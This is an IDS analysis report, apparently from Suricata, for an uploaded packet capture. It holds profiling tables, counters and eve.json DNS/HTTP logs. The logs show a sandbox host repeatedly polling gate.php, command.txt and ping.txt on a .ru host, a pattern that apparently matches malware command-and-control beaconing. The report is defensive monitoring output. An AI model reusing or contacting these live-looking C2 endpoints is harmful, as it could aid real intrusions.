Filename: pcap (4).pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 26.7647972107 seconds
Hash: 4af40c2c9c43f7fcc993afd736c52ccf
Uploaded: 1568631013

Logfiles


packet_stats.log - (16159 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1             5        369573862      608843078     533292336          2.7b    1.01
 IPv4       2            14         18760448      761073476     235017647          3.3b    1.24
 IPv4       6           382          4662594      852498610     538649912        205.8b   77.65
 IPv4      17           174         19705326      779272554     306225051         53.3b   20.11
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1             5           159118         242950        218170          1.1m    0.13
TMM_FLOWWORKER              IPv4       2            14           132932         449214        167735          2.3m    0.27
TMM_FLOWWORKER              IPv4       6           382           116962       17424238       2004075        765.6m   88.10
TMM_FLOWWORKER              IPv4      17           174           204274       10788790        542547         94.4m   10.86
TMM_RECEIVEPCAPFILE         IPv4       1             5             4502           5436          4907         24.5k    0.00
TMM_RECEIVEPCAPFILE         IPv4       2            14             4448           5482          4656         65.2k    0.01
TMM_RECEIVEPCAPFILE         IPv4       6           379             4444           7138          4880          1.8m    0.21
TMM_RECEIVEPCAPFILE         IPv4      17           174             4444           5842          4793        834.1k    0.10
TMM_DECODEPCAPFILE          IPv4       1             5             4618          20396          7926         39.6k    0.00
TMM_DECODEPCAPFILE          IPv4       2            14             4556          14744          5453         76.4k    0.01
TMM_DECODEPCAPFILE          IPv4       6           379             4560          19130          4796          1.8m    0.21
TMM_DECODEPCAPFILE          IPv4      17           174             4574          20482          4911        854.6k    0.10

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       1             5             5548           6232          5895         29.5k  0.00  
flow                    IPv4       6           379             4774          31070          5857          2.2m  0.27  
flow                    IPv4      17           174             4752         419372          9321          1.6m  0.19  
stream                  IPv4       6           382             5116         449880         32596         12.5m  1.49  
app-layer               IPv4      17           174             4416          61920          9242          1.6m  0.19  
detect                  IPv4       1             5           139114         221734        197507        987.5k  0.12  
detect                  IPv4       2            14           123350         439662        157625          2.2m  0.26  
detect                  IPv4       6           382            78192       17363684       1897116        724.7m  86.94 
detect                  IPv4      17           174           176364       10752738        491797         85.6m  10.27 
tcp-prune               IPv4       6           382             4440          32758          5776          2.2m  0.26  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             6             5120          34420         16562         99.4k  20.68 
http                    IPv4      17             4             7414          44824         30397        121.6k  25.30 
dns                     IPv4      17            28             5964          23400          9271        259.6k  54.02 
Proto detect            IPv4      17            38             4786          38896          8864        336.9k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6             2            70544         196118        133331        266.7k  1.80  
LOGGER_UNIFIED2             IPv4       6             2            86566         166988        126777        253.6k  1.71  
LOGGER_JSON_ALERT           IPv4       6             2           106338         113464        109901        219.8k  1.48  
LOGGER_JSON_DNS             IPv4      17            18            35744         660172        107017          1.9m  12.97 
LOGGER_JSON_HTTP            IPv4       6            79            51786         224208         93244          7.4m  49.61 
LOGGER_JSON_FILE            IPv4       6            52            70788         224180         92588          4.8m  32.43 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1             5            18218          61218         29780       148.9k  0.16  
payload                           IPv4       6           325             4496       17120078         86386        28.1m  30.92 
payload                           IPv4      17           174             5114       10163028         85392        14.9m  16.36 
stream                            IPv4       6           325             4436         684714         44108        14.3m  15.79 
http_uri                          IPv4       6            79            11432         132924         27090         2.1m  2.36  
http_request_line                 IPv4       6            79             5884          16800          6689       528.5k  0.58  
http_client_body                  IPv4       6            79             4680          22902          5202       411.0k  0.45  
http_header (request)             IPv4       6            79            28810         136916         49587         3.9m  4.31  
http_header (request trailer)     IPv4       6            79             4498          26592          5035       397.8k  0.44  
http_header_names (request)       IPv4       6            79             8570         234148         15813         1.2m  1.38  
http_accept (request)             IPv4       6            79             4918          33312          6327       499.9k  0.55  
http_referer (request)            IPv4       6            79             4808           6380          5056       399.5k  0.44  
http_content_len (request)        IPv4       6            79             4866          34680          5695       450.0k  0.50  
http_content_type (request)       IPv4       6            79             4748           6550          5000       395.0k  0.44  
http_protocol (request)           IPv4       6            79             5208          26084          6423       507.5k  0.56  
http_start (request)              IPv4       6            79            10110          43782         14675         1.2m  1.28  
http_raw_header (request)         IPv4       6            79            14496          87468         20213         1.6m  1.76  
http_method                       IPv4       6            79             5628          11988          6561       518.4k  0.57  
http_cookie (request)             IPv4       6            79             4814          29216          5989       473.2k  0.52  
http_raw_uri                      IPv4       6            79             5566          31216          7169       566.4k  0.62  
http_user_agent                   IPv4       6            79            14148          51704         21315         1.7m  1.85  
http_host                         IPv4       6            79             6054          32398          8398       663.5k  0.73  
dns_query                         IPv4      17             9             6130          19092         12826       115.4k  0.13  
http_response_line                IPv4       6            79             5652         126738         10067       795.3k  0.88  
http_header (response)            IPv4       6            79            17798         171262         34245         2.7m  2.98  
http_header (response trailer)    IPv4       6            79             4492          29480          5154       407.2k  0.45  
http_content_type (response)      IPv4       6            79             5892          42622          8468       669.0k  0.74  
http_raw_header (response)        IPv4       6           159             6322          30420         10407         1.7m  1.82  
http_cookie (response)            IPv4       6            79             4888          18402          5472       432.3k  0.48  
http_stat_code                    IPv4       6            79             4890          22380          5681       448.8k  0.49  
file_data (http response)         IPv4       6            80             4470        2881212        107483         8.6m  9.47  
Total                             IPv4                  2973                                         30542        90.8m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       1             3            41958          42692         42281        126.8k  0.01  
PROF_DETECT_IPONLY          IPv4       2            14            41270         345312         66980        937.7k  0.08  
PROF_DETECT_IPONLY          IPv4       6             8            23862         137596         69656        557.3k  0.05  
PROF_DETECT_IPONLY          IPv4      17            40             7326         115358         56579          2.3m  0.19  
PROF_DETECT_RULES           IPv4       1             5            14626          51224         32276        161.4k  0.01  
PROF_DETECT_RULES           IPv4       2            14             4424           4792          4468         62.6k  0.01  
PROF_DETECT_RULES           IPv4       6           382             4436       16257890       1529727        584.4m  48.76 
PROF_DETECT_RULES           IPv4      17           174            76290       10616746        265137         46.1m  3.85  
PROF_DETECT_STATEFUL_START    IPv4       6           278             8922       14104352       1055242        293.4m  24.48 
PROF_DETECT_STATEFUL_CONT    IPv4       1             5             4658           4860          4713         23.6k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       2            14             4400           4692          4500         63.0k  0.01  
PROF_DETECT_STATEFUL_CONT    IPv4       6           382             4442         305790         13559          5.2m  0.43  
PROF_DETECT_STATEFUL_CONT    IPv4      17           174             4400          69712          5811          1.0m  0.08  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           366             4454          27074          5017          1.8m  0.15  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            18             4590          30416          6355        114.4k  0.01  
PROF_DETECT_PREFILTER       IPv4       1             5            46000         116580         70334        351.7k  0.03  
PROF_DETECT_PREFILTER       IPv4       2            14            13560          22586         15212        213.0k  0.02  
PROF_DETECT_PREFILTER       IPv4       6           382            13620       17200908        282092        107.8m  8.99  
PROF_DETECT_PREFILTER       IPv4      17           174            41426       10209078        132277         23.0m  1.92  
PROF_DETECT_PF_PAYLOAD      IPv4       1             5            27374          70384         38925        194.6k  0.02  
PROF_DETECT_PF_PAYLOAD      IPv4       6           325            34428       17140938        144879         47.1m  3.93  
PROF_DETECT_PF_PAYLOAD      IPv4      17           174            14252       10175152         95157         16.6m  1.38  
PROF_DETECT_PF_TX           IPv4       6           366             4462        2901762        126881         46.4m  3.88  
PROF_DETECT_PF_TX           IPv4      17             9            15304          28824         22462        202.2k  0.02  
PROF_DETECT_PF_SORT1        IPv4       1             3             4684           5318          4908         14.7k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6           318             4544          42758          9270          2.9m  0.25  
PROF_DETECT_PF_SORT1        IPv4      17           174             4496          21046          5721        995.6k  0.08  
PROF_DETECT_PF_SORT2        IPv4       1             5             4744          22488          8382         41.9k  0.00  
PROF_DETECT_PF_SORT2        IPv4       2            14             4418           5362          4562         63.9k  0.01  
PROF_DETECT_PF_SORT2        IPv4       6           382             4426          87422          6418          2.5m  0.20  
PROF_DETECT_PF_SORT2        IPv4      17           174             4456          24638          5512        959.1k  0.08  
PROF_DETECT_NONMPMLIST      IPv4       1             5             4702           4932          4756         23.8k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       2            14             4438           4994          4633         64.9k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6           382             4430          30590          5225          2.0m  0.17  
PROF_DETECT_NONMPMLIST      IPv4      17           174             4422          25480          5190        903.2k  0.08  
PROF_DETECT_ALERT           IPv4       1             5             4456           4648          4545         22.7k  0.00  
PROF_DETECT_ALERT           IPv4       2            14             4420           4520          4456         62.4k  0.01  
PROF_DETECT_ALERT           IPv4       6           382             4422          33298          5142          2.0m  0.16  
PROF_DETECT_ALERT           IPv4      17           174             4426          29348          5037        876.5k  0.07  
PROF_DETECT_CLEANUP         IPv4       1             5             4516           4596          4568         22.8k  0.00  
PROF_DETECT_CLEANUP         IPv4       2            14             4426           6104          4577         64.1k  0.01  
PROF_DETECT_CLEANUP         IPv4       6           382             4496          26994          5319          2.0m  0.17  
PROF_DETECT_CLEANUP         IPv4      17           174             4414         419876          7319          1.3m  0.11  
PROF_DETECT_GETSGH          IPv4       1             5             4842          20842          8058         40.3k  0.00  
PROF_DETECT_GETSGH          IPv4       2            14             4672           4944          4761         66.7k  0.01  
PROF_DETECT_GETSGH          IPv4       6           382             4416          27590          5287          2.0m  0.17  
PROF_DETECT_GETSGH          IPv4      17           174             4430         127208          8241          1.4m  0.12  


stats.log - (3295 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
------------------------------------------------------------------------------------
Date: 9/16/2019 -- 10:50:40 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 600
decoder.bytes                              | Total                     | 191276
decoder.ipv4                               | Total                     | 572
decoder.ethernet                           | Total                     | 600
decoder.tcp                                | Total                     | 379
decoder.udp                                | Total                     | 174
decoder.icmpv4                             | Total                     | 5
decoder.avg_pkt_size                       | Total                     | 318
decoder.max_pkt_size                       | Total                     | 1153
flow.tcp                                   | Total                     | 4
flow.udp                                   | Total                     | 31
tcp.sessions                               | Total                     | 4
tcp.syn                                    | Total                     | 4
tcp.synack                                 | Total                     | 4
tcp.rst                                    | Total                     | 1
tcp.overlap                                | Total                     | 2
detect.alert                               | Total                     | 2
detect.mpm_list                            | Total                     | 25
detect.nonmpm_list                         | Total                     | 2
detect.fnonmpm_list                        | Total                     | 1
detect.match_list                          | Total                     | 25
app_layer.flow.http                        | Total                     | 4
app_layer.tx.http                          | Total                     | 79
app_layer.flow.dns_udp                     | Total                     | 9
app_layer.tx.dns_udp                       | Total                     | 9
app_layer.flow.failed_udp                  | Total                     | 22
flow_mgr.new_pruned                        | Total                     | 17
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 34
flow_mgr.flows_notimeout                   | Total                     | 17
flow_mgr.flows_timeout                     | Total                     | 17
flow_mgr.flows_removed                     | Total                     | 17
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65502
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7084384


eve.json - (88917 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
{"timestamp":"2019-09-11T14:44:20.377608+0000","flow_id":667706491978504,"pcap_cnt":105,"event_type":"dns","src_ip":"192.168.56.101","src_port":60992,"dest_ip":"192.168.56.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26119,"rrname":"x0x22a3720.temp.swtest.ru","rrtype":"A","tx_id":0}}
{"timestamp":"2019-09-11T14:44:21.377425+0000","flow_id":246005128086097,"pcap_cnt":108,"event_type":"dns","src_ip":"192.168.56.101","src_port":60992,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26119,"rrname":"x0x22a3720.temp.swtest.ru","rrtype":"A","tx_id":0}}
{"timestamp":"2019-09-11T14:44:21.476340+0000","flow_id":246005128086097,"pcap_cnt":109,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.101","dest_port":60992,"proto":"UDP","dns":{"type":"answer","id":26119,"rcode":"NOERROR","rrname":"x0x22a3720.temp.swtest.ru","rrtype":"A","ttl":599,"rdata":"77.222.62.31"}}
{"timestamp":"2019-09-11T14:44:21.812215+0000","flow_id":531158744261815,"pcap_cnt":116,"event_type":"dns","src_ip":"192.168.56.101","src_port":60082,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49433,"rrname":"8.8.8.8.in-addr.arpa","rrtype":"PTR","tx_id":0}}
{"timestamp":"2019-09-11T14:44:21.818624+0000","flow_id":1133130623057344,"pcap_cnt":117,"event_type":"dns","src_ip":"192.168.56.101","src_port":58854,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10911,"rrname":"31.62.222.77.in-addr.arpa","rrtype":"PTR","tx_id":0}}
{"timestamp":"2019-09-11T14:44:21.845972+0000","flow_id":2154753018919982,"pcap_cnt":118,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/gate.php?status=Free&rnd=860866723.862194","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2019-09-11T14:44:21.872732+0000","flow_id":531158744261815,"pcap_cnt":119,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.101","dest_port":60082,"proto":"UDP","dns":{"type":"answer","id":49433,"rcode":"NOERROR","rrname":"8.8.8.8.in-addr.arpa","rrtype":"PTR","ttl":20947,"rdata":"dns.google"}}
{"timestamp":"2019-09-11T14:44:21.918864+0000","flow_id":1133130623057344,"pcap_cnt":122,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.101","dest_port":58854,"proto":"UDP","dns":{"type":"answer","id":10911,"rcode":"NOERROR","rrname":"31.62.222.77.in-addr.arpa","rrtype":"PTR","ttl":599,"rdata":"vh274.sweb.ru"}}
{"timestamp":"2019-09-11T14:44:22.518558+0000","flow_id":2154753018919982,"pcap_cnt":127,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=593589424.899796","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:22.577072+0000","flow_id":2154753018919982,"pcap_cnt":129,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=593589424.899796","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4},"app_proto":"http","fileinfo":{"filename":"\/command.txt","gaps":false,"state":"CLOSED","stored":false,"size":4,"tx_id":1}}
{"timestamp":"2019-09-11T14:44:22.829979+0000","flow_id":2154753018919982,"pcap_cnt":132,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=58812440.2064312","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:24.016978+0000","flow_id":2154753018919982,"pcap_cnt":134,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=58812440.2064312","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17},"app_proto":"http","fileinfo":{"filename":"\/ping.txt","gaps":false,"state":"CLOSED","stored":false,"size":17,"tx_id":2}}
{"timestamp":"2019-09-11T14:44:24.221235+0000","flow_id":2154753018919982,"pcap_cnt":135,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/gate.php?status=Free&rnd=471050500.456599","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2019-09-11T14:44:24.533912+0000","flow_id":2154753018919982,"pcap_cnt":138,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=469443738.521653","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:24.624200+0000","flow_id":2154753018919982,"pcap_cnt":140,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=469443738.521653","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4},"app_proto":"http","fileinfo":{"filename":"\/command.txt","gaps":false,"state":"CLOSED","stored":false,"size":4,"tx_id":4}}
{"timestamp":"2019-09-11T14:44:24.830725+0000","flow_id":2154753018919982,"pcap_cnt":141,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=852758285.972451","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:25.992173+0000","flow_id":2154753018919982,"pcap_cnt":143,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=852758285.972451","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17},"app_proto":"http","fileinfo":{"filename":"\/ping.txt","gaps":false,"state":"CLOSED","stored":false,"size":17,"tx_id":5}}
{"timestamp":"2019-09-11T14:44:26.206374+0000","flow_id":2154753018919982,"pcap_cnt":144,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/gate.php?status=Free&rnd=324320375.946381","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2019-09-11T14:44:26.533606+0000","flow_id":2154753018919982,"pcap_cnt":147,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=238399982.975593","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:26.690824+0000","flow_id":2154753018919982,"pcap_cnt":149,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=238399982.975593","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4},"app_proto":"http","fileinfo":{"filename":"\/command.txt","gaps":false,"state":"CLOSED","stored":false,"size":4,"tx_id":7}}
{"timestamp":"2019-09-11T14:44:26.892962+0000","flow_id":2154753018919982,"pcap_cnt":150,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=592764555.03687","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:28.017356+0000","flow_id":2154753018919982,"pcap_cnt":152,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=592764555.03687","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17},"app_proto":"http","fileinfo":{"filename":"\/ping.txt","gaps":false,"state":"CLOSED","stored":false,"size":17,"tx_id":8}}
{"timestamp":"2019-09-11T14:44:28.220770+0000","flow_id":2154753018919982,"pcap_cnt":153,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/gate.php?status=Free&rnd=259498715.6222","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2019-09-11T14:44:28.564917+0000","flow_id":2154753018919982,"pcap_cnt":156,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=729007541.675316","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:28.742387+0000","flow_id":2154753018919982,"pcap_cnt":158,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=729007541.675316","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4},"app_proto":"http","fileinfo":{"filename":"\/command.txt","gaps":false,"state":"CLOSED","stored":false,"size":4,"tx_id":10}}
{"timestamp":"2019-09-11T14:44:28.955471+0000","flow_id":2154753018919982,"pcap_cnt":159,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=652970073.99542","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
